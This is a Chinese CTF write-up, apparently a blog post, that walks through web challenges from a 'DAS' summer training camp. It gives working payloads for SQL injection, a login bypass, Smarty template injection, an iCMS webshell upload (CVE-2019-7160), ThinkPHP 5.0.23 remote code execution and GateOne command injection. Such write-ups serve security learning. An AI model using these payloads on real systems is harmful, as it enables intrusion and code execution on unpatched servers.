DAS暑期训练营web

Sql1.0[简单]

user-agent头注入、报错注入

payload: User-Agent: ‘,’1’,updatexml(1,concat(0x7e,(select * from secert),0x7e),1))#


Dashboard[困难]

登录框测试了一下 过滤了< ,> ,= ,^ , rexexp 等常用sql注入语句。所以猜测是万能密码之类的

用userName=12&passWord=||1#

登录成功

Y1ng%%%%

本来以为

这地方注入的。没测出来。发现了修改个人信息

测试后发现是smart模板。而smart支持{if xxx}{/if}语法

过滤了readfile、highlight、file_get_contents()、system、eval没过滤show_source

猜测是无参数rce

构造发现使用:

{if print_r(scandir(current(localeconv())))}{/if}可以读到当前目录文件

使用var_dump(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))))}{/if}

可以读到根目录

但是flag在数组第七个位置,构造了半天没返回,

{if show_source(current(array_slice(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))),7)))}{/if}

这样就行

尝试使用getallheadlers

测试发现虽然没有system执行任意命令,但还是可以通过构造读文件函数读到flag

{if show_source(end(getallheaders()))}{/if}


icms[简单]

找到后台界面:admincp.php

弱密码admin/admin123登录后台

在github可以发现文件遍历的issues

https://github.com/idreamsoft/iCMS/issues/54

可以看到根目录的flag文件

找到CVE-2019-7160

https://xz.aliyun.com/t/4030#toc-1

按照其步骤复现

将附件设置为/目录

找一个上传文件目录抓包修改

POST /admincp.php?app=files&do=IO&frame=iPHP&ext=zip&udir=&name=iCMS.APP.1-v1.1.1&watermark=false&CSRF_TOKEN=1401a5a70d407bf579b488d9e0939ceb84a9ce84 HTTP/1.1
Host: das.wetolink.com:48885
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: gateone_user="2|1:0|10:1594050688|12:gateone_user|108:eyJ1cG4iOiAiQU5PTllNT1VTIiwgInNlc3Npb24iOiAiTWpnNE9XVTFObVEwT1dJMU5HWmhNamxsWlRJMk9HUmlaak16TTJVeE0yRXlZIn0=|5f2f4537826218e819f771febdabc01d172ccd3d1d817223873deecbf4089abd"; __utma=229657609.1315421077.1594050728.1594050728.1594050728.1; __utmz=229657609.1594050728.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); iCMS_article_category_tabs=tree; iCMS_ACP_sidebar_mini=0; session=14aa621e-dbc6-4412-83ff-a3712922d49c.DfUSj_-cdrNBUe9PNiPpKnWpCGs; iCMS_apps_tab=apps-type-1; iCMS_iCMS_AUTH=99433c0cnzbDwSBRKsOqWQV0LT32_A3GhblsYcFtK3Tr-FYq0SCiBZmTczLk14AGCYoMbBcl2VsgAFTisVVfyvt2Ag5IjZT6RIkqlDoyaLfZ47UrxaPdtqw7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 198

在下面用burp导入自己的zip马

上传成功

安装时虽然会报错,但是不影响使用

访问ip/app/你的shell即可


NiuShop[简单]

thinkphp5.0.23一把梭

get:  ?s=captcha
post: _method=__construct&filter[]=system&method=get&get[]=whoami

GateOne[中等]

赵总的0day,%%%

https://github.com/liftoff/GateOne/issues/736

输入我们的vps连接,等待输入密码的时候,在console输入

GateOne.ws.send('{"terminal:ssh_get_host_fingerprint":{"host":"127.0.0.1","port":"80 ;ls /;"}}')

即可看到flag

 

发表评论

邮箱地址不会被公开。 必填项已用*标注